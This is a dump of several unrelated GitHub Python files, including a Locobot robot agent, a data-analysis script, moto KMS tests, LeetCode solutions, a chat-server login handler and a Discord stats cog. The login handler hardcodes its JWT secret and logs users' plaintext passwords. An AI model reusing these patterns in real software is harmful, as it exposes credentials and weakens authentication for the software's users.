count\n\n\n\nif __name__ == \"__main__\":\n n = int(input())\n s = Solution()\n for _ in range(n):\n print(s.solute(int(input())))","repo_name":"Zzhaoo/NJU-2021-LCYOJ","sub_path":"4/4-2.py","file_name":"4-2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39882366113","text":"import os\nimport sys\nimport subprocess\nimport re\nimport numpy as np\nimport dldashboard\n\nif __name__ == \"__main__\":\n # this line has to go before any imports that contain @sio.on functions\n # or else, those @sio.on calls become no-ops\n dldashboard.start()\n\nfrom base_agent.nsp_dialogue_manager import NSPDialogueManager\nfrom locobot.agent.loco_memory import LocoAgentMemory\nfrom base_agent.base_util import to_player_struct, Pos, Look, Player, hash_user\nfrom base_agent.memory_nodes import PlayerNode\nfrom base_agent.loco_mc_agent import LocoMCAgent\nfrom locobot.agent.perception import Perception, SelfPerception\nfrom base_agent.argument_parser import ArgumentParser\nimport locobot.agent.default_behaviors as default_behaviors\nfrom locobot.agent.dialogue_objects import LocoBotCapabilities, LocoGetMemoryHandler, PutMemoryHandler, LocoInterpreter\nimport locobot.agent.rotation as rotation\nfrom locobot.agent.locobot_mover import LoCoBotMover\nfrom multiprocessing import set_start_method\nimport time\nimport signal\nimport random\nimport logging\nimport faulthandler\nfrom dlevent import sio\n\nBASE_AGENT_ROOT = os.path.join(os.path.dirname(__file__), \"../../\")\nSCHEMAS = [os.path.join(os.path.join(BASE_AGENT_ROOT, \"base_agent\"), \"base_memory_schema.sql\")]\n\nfaulthandler.register(signal.SIGUSR1)\n\nrandom.seed(0)\nlog_formatter = logging.Formatter(\n \"%(asctime)s [%(filename)s:%(lineno)s - %(funcName)s() %(levelname)s]: %(message)s\"\n)\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.getLogger().handlers.clear()\n\n\nclass LocobotAgent(LocoMCAgent):\n \"\"\"Implements an instantiation of the LocoMCAgent on a Locobot. It starts\n off the agent processes including launching the dashboard.\n\n Args:\n opts (argparse.Namespace): opts returned by the ArgumentParser with defaults set\n that you can override.\n name (string, optional): a name for your agent (default: Locobot)\n\n Example:\n >>> python locobot_agent.py --backend 'locobot'\n \"\"\"\n\n coordinate_transforms = rotation\n\n def __init__(self, opts, name=\"Locobot\"):\n super(LocobotAgent, self).__init__(opts)\n logging.info(\"LocobotAgent.__init__ started\")\n self.opts = opts\n self.entityId = 0\n self.no_default_behavior = opts.no_default_behavior\n self.last_chat_time = -1000000000000\n self.name = name\n self.player = Player(100, name, Pos(0, 0, 0), Look(0, 0))\n self.pos = Pos(0, 0, 0)\n self.uncaught_error_count = 0\n self.last_task_memid = None\n self.point_targets = []\n self.init_event_handlers()\n # list of (prob, default function) pairs\n self.visible_defaults = [(1.0, default_behaviors.explore)]\n\n def init_event_handlers(self):\n super().init_event_handlers()\n\n @sio.on(\"command\")\n def test_command(sid, commands):\n movement = [0.0, 0.0, 0.0]\n for command in commands:\n if command == \"MOVE_FORWARD\":\n movement[0] += 0.1\n print(\"action: FORWARD\")\n elif command == \"MOVE_BACKWARD\":\n movement[0] -= 0.1\n print(\"action: BACKWARD\")\n elif command == \"MOVE_LEFT\":\n movement[2] += 0.3\n print(\"action: LEFT\")\n elif command == \"MOVE_RIGHT\":\n movement[2] -= 0.3\n print(\"action: RIGHT\")\n elif command == \"PAN_LEFT\":\n self.mover.bot.set_pan(\n self.mover.bot.get_pan() + 0.08\n )\n elif command == \"PAN_RIGHT\":\n self.mover.bot.set_pan(\n self.mover.bot.get_pan() - 0.08\n )\n elif command == \"TILT_UP\":\n self.mover.bot.set_tilt(\n self.mover.bot.get_tilt() - 0.08\n )\n elif command == \"TILT_DOWN\":\n self.mover.bot.set_tilt(\n self.mover.bot.get_tilt() + 0.08\n )\n self.mover.move_relative([movement])\n\n def init_memory(self):\n \"\"\"Instantiates memory for the agent.\n\n Uses the DB_FILE environment variable to write the memory to a\n file or saves it in-memory otherwise.\n \"\"\"\n self.memory = LocoAgentMemory(\n db_file=os.environ.get(\"DB_FILE\", \":memory:\"),\n db_log_path=None,\n )\n logging.info(\"Initialized agent memory\")\n\n def init_perception(self):\n \"\"\"Instantiates all perceptual modules.\n\n Each perceptual module should have a perceive method that is\n called by the base agent event loop.\n \"\"\"\n if not hasattr(self, \"perception_modules\"):\n self.perception_modules = {}\n self.perception_modules[\"self\"] = SelfPerception(self)\n self.perception_modules[\"vision\"] = Perception(self, self.opts.perception_model_dir)\n\n def init_controller(self):\n \"\"\"Instantiates controllers - the components that convert a text chat to task(s).\"\"\"\n dialogue_object_classes = {}\n dialogue_object_classes[\"bot_capabilities\"] = LocoBotCapabilities\n dialogue_object_classes[\"interpreter\"] = LocoInterpreter\n dialogue_object_classes[\"get_memory\"] = LocoGetMemoryHandler\n dialogue_object_classes[\"put_memory\"] = PutMemoryHandler\n self.dialogue_manager = NSPDialogueManager(self, dialogue_object_classes, self.opts)\n\n def init_physical_interfaces(self):\n \"\"\"Instantiates the interface to physically move the robot.\"\"\"\n self.mover = LoCoBotMover(ip=self.opts.ip, backend=self.opts.backend, use_dslam=self.opts.use_dslam)\n\n def get_player_struct_by_name(self, speaker_name):\n p = self.memory.get_player_by_name(speaker_name)\n if p:\n return p.get_struct()\n else:\n return None\n\n def get_other_players(self):\n return [self.player]\n\n def get_incoming_chats(self):\n all_chats = []\n speaker_name = \"dashboard\"\n if self.dashboard_chat is not None:\n if not self.memory.get_player_by_name(speaker_name):\n PlayerNode.create(\n self.memory,\n to_player_struct((None, None, None), None, None, None, speaker_name),\n )\n all_chats.append(self.dashboard_chat)\n self.dashboard_chat = None\n return all_chats\n\n # # FIXME!!!!\n def send_chat(self, chat: str):\n logging.info(\"Sending chat: {}\".format(chat))\n # Send the socket event to show this reply on dashboard\n sio.emit(\"showAssistantReply\", {'agent_reply' : \"Agent: {}\".format(chat)})\n self.memory.add_chat(self.memory.self_memid, chat)\n # actually send the chat, FIXME FOR HACKATHON\n # return self._cpp_send_chat(chat)\n\n def step(self):\n super().step()\n time.sleep(0)\n\n def task_step(self, sleep_time=0.0):\n super().task_step(sleep_time=sleep_time)\n\n\nif __name__ == \"__main__\":\n base_path = os.path.dirname(__file__)\n parser = ArgumentParser(\"Locobot\", base_path)\n opts = parser.parse()\n\n logging.basicConfig(level=opts.log_level.upper())\n # set up stdout logging\n sh = logging.StreamHandler()\n sh.setFormatter(log_formatter)\n logging.getLogger().addHandler(sh)\n logging.info(\"LOG LEVEL: {}\".format(logger.level))\n \n # Check that models and datasets are up to date\n if not opts.dev:\n rc = subprocess.call([opts.verify_hash_script_path, \"locobot\"])\n\n set_start_method(\"spawn\", force=True)\n\n sa = LocobotAgent(opts)\n sa.start()\n","repo_name":"kandluis/droidlet","sub_path":"locobot/agent/locobot_agent.py","file_name":"locobot_agent.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"33751608705","text":"################################################################################\n# Exploratory Data Analysis\n# columns list(sample)\n# sample.drop('is_listened', 1)\n# yes = sample.loc[sample['is_listened'] == 1]\n# no = sample.loc[sample['is_listened'] == 0]\n################################################################################\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom preprocess import preprocess_helper as helper\n# plt.style.use('seaborn-deep')\n\n# read the sample\nsample = helper.preprocess_default('data/train_sample_0.csv')\n\n\ndef age_skip_song():\n # relationship between age and skip song\n age_listen = sample[['user_age', 'is_listened']]\n ages = age_listen['user_age'].unique()\n ages.sort()\n table = age_listen.groupby(['user_age', 'is_listened']).size()\n table = table.sort_index(level='is_listened')\n result = table.as_matrix()\n\n plt.bar(ages, result[13:], width=0.5, color='g', align='center')\n plt.bar(ages+0.5, result[:13], width=0.5, color='r', align='center')\n plt.legend(('Is Listened', 'Not Listened'), loc='upper right')\n plt.show()\n\n\ndef times():\n # At which time the people hear the songs\n hour = sample[['hour']]\n hours = hour['hour'].unique()\n hours.sort()\n table = hour.groupby(['hour']).size()\n table = table.sort_index(level='hour')\n result = table.as_matrix()\n\n plt.bar(hours, result, width=0.5, color='g', align='center')\n plt.legend(\"People hearing music\", loc='upper right')\n plt.xlim(0, 24)\n plt.show()\n\n#---\n\ndef histogram(sample, column_name):\n \"\"\"Create a histogram\"\"\"\n column = sample[[column_name]]\n values = column[column_name].unique()\n values.sort()\n #print(values)\n table = column.groupby([column_name]).size()\n table = table.sort_index(level=column_name)\n #print(table)\n result = table.as_matrix()\n\n plt.bar(values, result, width=0.5, color='g', align='center')\n plt.legend(\"Title\", loc='upper right')\n # plt.xlim(values[0], values[-1])\n plt.show()\n\n\n\ndef draw_platform_family_by_age(id, title):\n \"\"\"draws how many users listened or not a track in a certain \n platform_family by age\"\"\"\n sub_sample = sample[['platform_family','user_age','is_listened']]\n sub_sample = sub_sample[(sub_sample.platform_family == id)]\n\n ages = sub_sample['user_age'].unique()\n ages.sort()\n\n table = sub_sample.groupby(['platform_family','user_age', 'is_listened']).size()\n table = table.sort_index(level='is_listened')\n table_matrix = table.as_matrix()\n\n plt.title(title)\n\n # bug: when the number of ages is not exactly 13, but with all the data set, less probable.\n\n plt.bar(ages, table_matrix[13:], width=0.5, color='g', align='center')\n plt.bar(ages+0.5, table_matrix[:13], width=0.5, color='r', align='center')\n\n plt.legend(('Is Listened', 'Not Listened'), loc='upper right')\n plt.ylabel(\"Quantity\");\n plt.xlabel(\"Ages\");\n\n plt.show()\n\n\n# histogram(sample, 'release_year')\n# times()\n# age_skip_song()\n\n# for platform_family 0\ndraw_platform_family_by_age(0, \"Platform Family 0\")\n# for platform_family 1\ndraw_platform_family_by_age(1, \"Platform Family 1\")\n# for platform_family 2\ndraw_platform_family_by_age(2, \"Platform Family 2\")\n\n","repo_name":"omartrinidad/challenge","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32306597271","text":"import pytest\n\nfrom moto.kms.exceptions import (\n AccessDeniedException,\n InvalidCiphertextException,\n NotFoundException,\n ValidationException,\n)\nfrom moto.kms.models import Key\nfrom moto.kms.utils import (\n _deserialize_ciphertext_blob,\n _serialize_ciphertext_blob,\n _serialize_encryption_context,\n generate_data_key,\n generate_master_key,\n MASTER_KEY_LEN,\n encrypt,\n decrypt,\n Ciphertext,\n KeySpec,\n SigningAlgorithm,\n RSAPrivateKey,\n ECDSAPrivateKey,\n)\n\nENCRYPTION_CONTEXT_VECTORS = [\n (\n {\"this\": \"is\", \"an\": \"encryption\", \"context\": \"example\"},\n b\"an\" b\"encryption\" b\"context\" b\"example\" b\"this\" b\"is\",\n ),\n (\n {\"a_this\": \"one\", \"b_is\": \"actually\", \"c_in\": \"order\"},\n b\"a_this\" b\"one\" b\"b_is\" b\"actually\" b\"c_in\" b\"order\",\n ),\n]\nCIPHERTEXT_BLOB_VECTORS = [\n (\n Ciphertext(\n key_id=\"d25652e4-d2d2-49f7-929a-671ccda580c6\",\n iv=b\"123456789012\",\n ciphertext=b\"some ciphertext\",\n tag=b\"1234567890123456\",\n ),\n b\"d25652e4-d2d2-49f7-929a-671ccda580c6\"\n b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext\",\n ),\n (\n Ciphertext(\n key_id=\"d25652e4-d2d2-49f7-929a-671ccda580c6\",\n iv=b\"123456789012\",\n ciphertext=b\"some ciphertext that is much longer now\",\n tag=b\"1234567890123456\",\n ),\n b\"d25652e4-d2d2-49f7-929a-671ccda580c6\"\n b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext that is much longer now\",\n ),\n]\n\n\ndef test_KeySpec_Enum():\n assert KeySpec.rsa_key_specs() == sorted(\n [KeySpec.RSA_2048, KeySpec.RSA_3072, KeySpec.RSA_4096]\n )\n assert KeySpec.ecc_key_specs() == sorted(\n [\n KeySpec.ECC_NIST_P256,\n KeySpec.ECC_SECG_P256K1,\n KeySpec.ECC_NIST_P384,\n KeySpec.ECC_NIST_P521,\n ]\n )\n assert KeySpec.hmac_key_specs() == sorted(\n [KeySpec.HMAC_224, KeySpec.HMAC_256, KeySpec.HMAC_284, KeySpec.HMAC_512]\n )\n\n\ndef test_SigningAlgorithm_Enum():\n assert SigningAlgorithm.rsa_signing_algorithms() == sorted(\n [\n SigningAlgorithm.RSASSA_PSS_SHA_256,\n SigningAlgorithm.RSASSA_PSS_SHA_384,\n SigningAlgorithm.RSASSA_PSS_SHA_512,\n SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_256,\n SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_384,\n SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_512,\n ]\n )\n assert SigningAlgorithm.ecc_signing_algorithms() == sorted(\n [\n SigningAlgorithm.ECDSA_SHA_256,\n SigningAlgorithm.ECDSA_SHA_384,\n SigningAlgorithm.ECDSA_SHA_512,\n ]\n )\n\n\ndef test_RSAPrivateKey_invalid_key_size():\n with pytest.raises(ValidationException) as ex:\n _ = RSAPrivateKey(key_size=100)\n assert (\n ex.value.message\n == \"1 validation error detected: Value at 'key_size' failed to satisfy constraint: Member must satisfy enum value set: [2048, 3072, 4096]\"\n )\n\n\ndef test_ECDSAPrivateKey_invalid_key_spec():\n with pytest.raises(ValidationException) as ex:\n _ = ECDSAPrivateKey(key_spec=\"InvalidKeySpec\")\n assert (\n ex.value.message\n == \"1 validation error detected: Value at 'key_spec' failed to satisfy constraint: Member must satisfy enum value set: ['ECC_NIST_P256', 'ECC_NIST_P384', 'ECC_NIST_P521', 'ECC_SECG_P256K1']\"\n )\n\n\ndef test_generate_data_key():\n test = generate_data_key(123)\n\n assert isinstance(test, bytes)\n assert len(test) == 123\n\n\ndef test_generate_master_key():\n test = generate_master_key()\n\n assert isinstance(test, bytes)\n assert len(test) == MASTER_KEY_LEN\n\n\n@pytest.mark.parametrize(\"raw,serialized\", ENCRYPTION_CONTEXT_VECTORS)\ndef test_serialize_encryption_context(raw, serialized):\n test = _serialize_encryption_context(raw)\n assert test == serialized\n\n\n@pytest.mark.parametrize(\"raw,_serialized\", CIPHERTEXT_BLOB_VECTORS)\ndef test_cycle_ciphertext_blob(raw, _serialized):\n test_serialized = _serialize_ciphertext_blob(raw)\n test_deserialized = _deserialize_ciphertext_blob(test_serialized)\n assert test_deserialized == raw\n\n\n@pytest.mark.parametrize(\"raw,serialized\", CIPHERTEXT_BLOB_VECTORS)\ndef test_serialize_ciphertext_blob(raw, serialized):\n test = _serialize_ciphertext_blob(raw)\n assert test == serialized\n\n\n@pytest.mark.parametrize(\"raw,serialized\", CIPHERTEXT_BLOB_VECTORS)\ndef test_deserialize_ciphertext_blob(raw, serialized):\n test = _deserialize_ciphertext_blob(serialized)\n assert test == raw\n\n\n@pytest.mark.parametrize(\n \"encryption_context\", [ec[0] for ec in ENCRYPTION_CONTEXT_VECTORS]\n)\ndef test_encrypt_decrypt_cycle(encryption_context):\n plaintext = b\"some secret plaintext\"\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n\n ciphertext_blob = encrypt(\n master_keys=master_key_map,\n key_id=master_key.id,\n plaintext=plaintext,\n encryption_context=encryption_context,\n )\n assert ciphertext_blob != plaintext\n\n decrypted, decrypting_key_id = decrypt(\n master_keys=master_key_map,\n ciphertext_blob=ciphertext_blob,\n encryption_context=encryption_context,\n )\n assert decrypted == plaintext\n assert decrypting_key_id == master_key.id\n\n\ndef test_encrypt_unknown_key_id():\n with pytest.raises(NotFoundException):\n encrypt(\n master_keys={},\n key_id=\"anything\",\n plaintext=b\"secrets\",\n encryption_context={},\n )\n\n\ndef test_decrypt_invalid_ciphertext_format():\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n\n with pytest.raises(InvalidCiphertextException):\n decrypt(master_keys=master_key_map, ciphertext_blob=b\"\", encryption_context={})\n\n\ndef test_decrypt_unknwown_key_id():\n ciphertext_blob = (\n b\"d25652e4-d2d2-49f7-929a-671ccda580c6\"\n b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext\"\n )\n\n with pytest.raises(AccessDeniedException):\n decrypt(master_keys={}, ciphertext_blob=ciphertext_blob, encryption_context={})\n\n\ndef test_decrypt_invalid_ciphertext():\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n ciphertext_blob = (\n master_key.id.encode(\"utf-8\") + b\"123456789012\"\n b\"1234567890123456\"\n b\"some ciphertext\"\n )\n\n with pytest.raises(InvalidCiphertextException):\n decrypt(\n master_keys=master_key_map,\n ciphertext_blob=ciphertext_blob,\n encryption_context={},\n )\n\n\ndef test_decrypt_invalid_encryption_context():\n plaintext = b\"some secret plaintext\"\n master_key = Key(\"nop\", \"nop\", \"nop\", \"nop\", \"nop\", \"nop\")\n master_key_map = {master_key.id: master_key}\n\n ciphertext_blob = encrypt(\n master_keys=master_key_map,\n key_id=master_key.id,\n plaintext=plaintext,\n encryption_context={\"some\": \"encryption\", \"context\": \"here\"},\n )\n\n with pytest.raises(InvalidCiphertextException):\n decrypt(\n master_keys=master_key_map,\n ciphertext_blob=ciphertext_blob,\n encryption_context={},\n )\n","repo_name":"getmoto/moto","sub_path":"tests/test_kms/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":7366,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"4067967110","text":"# +\nimport torch, time\nimport numpy as np\nimport joblib\nimport logging as log\nfrom sklearn.decomposition import NMF\nfrom sklearn.utils import check_random_state\n\n\n\nclass NMFclass:\n def __init__(self, config):\n self.config = config\n\n \n def initialise_WH(self, X, n_components, random_state, H_init=None): \n \n avg = np.sqrt(X.mean() / n_components)\n rng = check_random_state(random_state)\n\n W_init = avg * rng.standard_normal(size=(X.shape[0], n_components)).astype('double', copy=False)\n W_init = np.abs(W_init)\n \n return W_init, H_init \n\n \n def p_onmf(self, X, rank, H_init=None, W_init=None, iterations=200, alpha=1.0):\n \n \n m, n = X.shape\n W = torch.rand(m, rank).to(self.config['cuda']) if isinstance(W_init, type(None)) else W_init\n H = torch.rand(rank, n).to(self.config['cuda']) if isinstance(H_init, type(None)) else H_init\n \n for itr in range(iterations):\n \n enum = torch.mm(X, torch.transpose(H, 0, 1))\n denom = torch.mm(W, torch.mm(H, torch.transpose(H, 0, 1)))\n W = torch.nan_to_num(torch.mul(W, torch.div(enum, denom)))\n \n HHTH = torch.mm(torch.mm(H, torch.transpose(H, 0, 1)), H)\n enum = torch.mm(torch.transpose(W, 0, 1), X) + torch.mul(H, alpha)\n denom = torch.mm(torch.mm(torch.transpose(W, 0, 1), W), H) + torch.mul(HHTH, 2.0 * alpha)\n H = torch.nan_to_num(torch.mul(H, torch.div(enum, denom)))\n \n W.to('cpu') \n H.to('cpu') \n \n return W, H\n \n \n\n def run(self, X, rank, H_init=None, W_init=None):\n \n X = X.to(self.config['cuda'])\n W, H = self.p_onmf(X, rank, H_init)\n\n X.to('cpu')\n del X\n return W, H\n","repo_name":"simra-shahid/hyhtm","sub_path":"codebase/nmf.py","file_name":"nmf.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15656694175","text":"class Solution:\n\n def __init__(self, w: List[int]):\n self.acc_weight = []\n self.total_weight = 0\n for weight in w:\n self.total_weight += weight\n self.acc_weight.append(self.total_weight)\n\n def pickIndex(self) -> int:\n target = self.total_weight * random.random()\n low, high = 0, len(self.acc_weight)\n while low < high:\n mid = low + (high - low)//2\n if self.acc_weight[mid] <= target:\n low = mid + 1\n else:\n high = mid\n return low\n \n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(w)\n# param_1 = obj.pickIndex()\n","repo_name":"doria112/SANDBOX","sub_path":"doria112/lc/528_Random_Pick_with_Weight_v2.py","file_name":"528_Random_Pick_with_Weight_v2.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1367858030","text":"#\n# @lc app=leetcode id=1292 lang=python3\n#\n# [1292] Maximum Side Length of a Square with Sum Less than or Equal to Threshold\n#\n\n# @lc code=start\nclass Solution:\n def maxSideLength(self, mat: List[List[int]], threshold: int) -> int:\n m, n = len(mat), len(mat[0])\n dp = [[0 for _ in range(n + 1)] for _ in range(m + 1)]\n best = 0\n for i in range(1, m + 1) :\n for j in range(1, n + 1) :\n dp[i][j] = mat[i - 1][j - 1] + dp[i][j - 1] + dp[i - 1][j] - dp[i - 1][j - 1]\n l, r = 1, min(i, j)\n while l <= r :\n k = (l + r) // 2\n _sum = dp[i][j] - dp[i - k][j] - dp[i][j - k] + dp[i - k][j - k]\n if _sum <= threshold:\n best = max(best, k)\n l = k + 1\n else:\n r = k - 1\n return best \n# @lc code=end\n\n","repo_name":"quixoteji/Leetcode","sub_path":"solutions/1292.maximum-side-length-of-a-square-with-sum-less-than-or-equal-to-threshold.py","file_name":"1292.maximum-side-length-of-a-square-with-sum-less-than-or-equal-to-threshold.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19519459005","text":"import json\nimport hashlib\nfrom db.DataDB import select_table\nfrom global_data import online_clients\nfrom user_chat import retrieve_messages\nimport jwt\nimport datetime\nimport rsa\nfrom tool_fuction import load_keys\n\nsecret_key = \"FluppyFR_Asuna\" # 服务器的密钥\n\n\ndef get_token(user_id, user_pwd):\n payload = {\n \"user_id\": user_id,\n \"user_pwd\": user_pwd,\n \"exp\": datetime.datetime.utcnow() + datetime.timedelta(minutes=3) # 令牌有效期\n }\n # secret_key = \"FluppyFR_Asuna\" # 服务器的密钥\n token = jwt.encode(payload, secret_key, algorithm=\"HS256\")\n return token\n\n\ndef verify_token(request_token, secret_key):\n try:\n decoded_payload = jwt.decode(request_token, secret_key, algorithms=[\"HS256\"])\n return decoded_payload\n except jwt.ExpiredSignatureError:\n # 令牌已过期\n return None\n except jwt.DecodeError:\n # 令牌验证失败\n return None\n\n\n# 在请求中提取令牌并验证\n\n\ndef user_login(data, socket, address, con):\n content = data[\"content\"]\n request_token = content[\"token\"]\n if request_token is not None:\n decoded_payload = verify_token(request_token, secret_key)\n if decoded_payload:\n user_id = decoded_payload[\"user_id\"]\n print(f\"user_id is {user_id}\")\n res = select_table(con, \"user\", user_id=int(user_id))\n user_pwd = decoded_payload[\"user_pwd\"]\n print(f\"Authenticated user: {user_pwd} (ID: {user_id})\")\n token_login = True\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0003\",\n 'content': {\n 'user_name': res[0][1],\n 'user_id': user_id\n }\n }\n online_clients[int(user_id)] = (socket, address)\n else:\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0005\",\n 'content': None\n }\n\n print(\"Token is invalid or expired.\")\n token_login = False\n else:\n res = select_table(con, \"user\", user_id=int(content[\"user_id\"])) # id为int型\n if len(res) == 0: # 未注册,返回空列表\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0002\",\n 'content': None\n }\n result = \"该用户未注册\"\n else:\n user_pwd = content[\"user_pwd\"]\n # hashed_user_pwd = hashlib.sha256(user_pwd.encode('utf-8')).hexdigest()\n # 用哈希加密就不能找回密码了,改成RSA加密\n pubkey, privkey = load_keys()\n # rsa生成的密文有随机性,解密了再比较\n res_pwd = rsa.decrypt(res[0][2], privkey).decode()\n # print(res[0][2])\n # print(hashed_user_pwd)\n # print(res[0][2])\n # print(rsa_pwd)\n if user_pwd == res_pwd:\n # 不能用rsa来get_token,先解码\n token = get_token(int(data[\"content\"][\"user_id\"]), res_pwd)\n print(type(token))\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0003\",\n 'content': {\n 'user_id': int(data['content']['user_id']),\n 'user_name': res[0][1],\n 'token': token\n }\n }\n result = \"用户名密码登录成功\"\n # 登录成功,维护在线用户表\n online_clients[int(data[\"content\"][\"user_id\"])] = (socket, address)\n # retrieve_messages(content['user_id'])\n else:\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0004\",\n 'content': {\n 'user_id': int(data['content']['user_id'])\n }\n }\n result = \"密码大概是错了\"\n back_json_data = json.dumps(back_data).encode('utf-8')\n socket.sendall(back_json_data)\n return result\n","repo_name":"TT2TER/Echoplex","sub_path":"server/user_login.py","file_name":"user_login.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4084107191","text":"import sys\nimport typing\nimport logging\nimport importlib\n\nimport discord\nfrom discord.ext import commands\n\nfrom Framework import mongo_utils, time_utils\n\nvar_config = importlib.__import__(\"Config.var_config_\" + sys.argv[1], fromlist=(\"var_config_\" + sys.argv[1]))\n\n\nclass Stats(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=['stats', 'stat'])\n async def _get_user_stats(self, ctx, *, args: typing.Optional[discord.Member] = None):\n await get_user_stats(ctx, args)\n\n @commands.command(aliases=['serverstats', 'svst'])\n @commands.has_permissions(manage_roles=True)\n async def _get_server_stats(self, ctx, type: typing.Optional[str] = None):\n await get_server_stats(ctx, type)\n\n @commands.command(aliases=['leaderboard', 'leader'])\n @commands.has_permissions(manage_roles=True)\n async def _get_leaderboard(self, ctx):\n await get_leaderboard(ctx)\n\n\nasync def get_user_stats(ctx: discord.ext.commands.Context, user: discord.Member):\n # if a mentioned user was not provided, fetches the stats of the author of the command\n if user is None:\n user = ctx.author\n\n # get the user's document from mongo database\n stats = mongo_utils.find_user_record(str(user.id), str(ctx.guild.id))\n\n # if there user has not practiced before their document will not exist in the database\n if stats is None:\n await ctx.reply(f'User {user.name}#{user.discriminator}\\'s record does not exist')\n return\n\n # retrieve their stats and return it in embed form\n last_rep = stats['info']['practiceStats']['lastRep']\n total_readable = time_utils.time_readable(stats['info']['practiceStats']['totalTime'])\n last_readable = time_utils.time_readable(stats['info']['practiceStats']['lastRepTime'])\n\n embed = discord.Embed()\n embed.colour = 16357382\n embed.timestamp = time_utils.now_date()\n embed.set_author(name=f'{user.name}#{user.discriminator}', icon_url=user.avatar_url)\n embed.set_thumbnail(url=user.avatar_url)\n\n embed.add_field(name='Last Repertoire', value=last_rep, inline=False)\n embed.add_field(name='Last Repertoire Practice Time', value=f'You practiced your last rep for: {last_readable[1]}h {last_readable[2]}m {last_readable[3]}s', inline=False)\n embed.add_field(name='Total Practice Time', value=f'Total Time Practiced: {total_readable[1]}h {total_readable[2]}m {total_readable[3]}s', inline=False)\n\n await(await ctx.reply(embed=embed)).delete(delay=20)\n return\n\n\nasync def get_server_stats(ctx: discord.ext.commands.Context, stat_type):\n # gets the server's stats from mongo\n stats = mongo_utils.find_server_record(str(ctx.guild.id))\n\n # if there is no server record (if no practice times have been recorded from any user in that server)\n if stats is None:\n await ctx.reply(f'This server\\'s record does not exist')\n return\n\n # return the stats for the server in embed form\n daily = time_utils.time_readable(stats['practiceStats']['dailyTotal'])\n weekly = time_utils.time_readable(stats['practiceStats']['weeklyTotal'])\n monthly = time_utils.time_readable(stats['practiceStats']['monthlyTotal'])\n yearly = time_utils.time_readable(stats['practiceStats']['yearlyTotal'])\n grand_total = time_utils.time_readable(stats['practiceStats']['grandTotal'])\n\n embed = discord.Embed()\n embed.colour = 16357382\n embed.timestamp = time_utils.now_date()\n embed.set_thumbnail(url='https://cdn.discordapp.com/attachments/693257204819689483/822353418839916544/IMG_1553.jpg')\n\n if stat_type == 'daily':\n embed.title = 'Daily Server Practice Time'\n embed.add_field(name='Daily Total', value=f'{daily[1]}h {daily[2]}m {daily[3]}s', inline=False)\n elif stat_type == 'weekly':\n embed.title = 'Weekly Server Practice Time'\n embed.add_field(name='Weekly Total', value=f'{weekly[0]}d {weekly[1]}h {weekly[2]}m {weekly[3]}s', inline=False)\n elif stat_type == 'monthly':\n embed.title = 'Monthly Server Practice Time'\n embed.add_field(name='Monthly Total', value=f'{monthly[0]}d {monthly[1]}h {monthly[2]}m {monthly[3]}s', inline=False)\n elif stat_type == 'yearly':\n embed.title = 'Yearly Practice Time'\n embed.add_field(name='Yearly Total', value=f'{yearly[0]}d {yearly[1]}h {yearly[2]}m {yearly[3]}s', inline=False)\n elif stat_type == 'grand':\n embed.title = 'Grand Total Practice Time'\n embed.add_field(name='Grand Total', value=f'{grand_total[0]}d {grand_total[1]}h {grand_total[2]}m {grand_total[3]}s', inline=False)\n elif stat_type == 'all' or None:\n embed.title = 'Server Practice Time Totals'\n embed.add_field(name='Daily Total', value=f'{daily[1]}h {daily[2]}m {daily[3]}s', inline=False)\n embed.add_field(name='Weekly Total', value=f'{weekly[0]}d {weekly[1]}h {weekly[2]}m {weekly[3]}s', inline=False)\n embed.add_field(name='Monthly Total', value=f'{monthly[0]}d {monthly[1]}h {monthly[2]}m {monthly[3]}s', inline=False)\n embed.add_field(name='Yearly Total', value=f'{yearly[0]}d {yearly[1]}h {yearly[2]}m {yearly[3]}s', inline=False)\n embed.add_field(name='Grand Total', value=f'{grand_total[0]}d {grand_total[1]}h {grand_total[2]}m {grand_total[3]}s', inline=False)\n\n await(await ctx.reply(embed=embed)).delete(delay=20)\n return\n\n\nasync def get_leaderboard(ctx: discord.ext.commands.Context):\n # get the server's practice leaderboard\n stat_list = mongo_utils.get_user_leaderboard(str(ctx.guild.id))\n\n # if there is no leaderboard (if no practice times have been recorded from any user in 